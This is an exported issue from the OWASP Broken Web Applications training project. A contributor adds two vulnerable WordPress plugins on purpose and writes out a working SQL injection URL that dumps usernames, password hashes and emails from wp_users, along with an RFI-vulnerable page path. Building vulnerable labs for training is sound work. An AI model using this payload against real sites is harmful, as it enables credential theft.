search

rosatolen / owaspbwa

Automatically exported from code.google.com/p/owaspbwa
0 stars 0 forks source link

Wordpress Plugins #19

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago 
To spice things up a bit, I added two plugins to WordPress (mygallery, 
spreadsheet). Also made a post on the front page about it.  Most people are 
running atleast one plug-in, so I thought this gave a more 'real world' 
perspective.  Also, both plug-ins suffer from vulenrabilities.

http://www.exploit-db.com/exploits/3814/
http://www.exploit-db.com/exploits/5486/

exploit: 
http://owaspbwa/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+
union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_use
rs--

the RFI will take some more work, but the vulnerable page is: 
http://owaspbwa/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrow
ser.php

You can remove the .zip plugin files from /var/www/wordpress/wp-content/plugins 
to save some space. 

If this gets added, let me know and i'll update vuln_list.html!

Original issue reported on code.google.com by MichaelTCyr@gmail.com on 20 Apr 2011 at 4:04

Attachments:

GoogleCodeExporter commented 9 years ago 
uploaded everything, and tested it.
fixed as of revision 161.
added items to vuln_list.html as of revision 162

Original comment by MichaelTCyr@gmail.com on 20 Apr 2011 at 4:24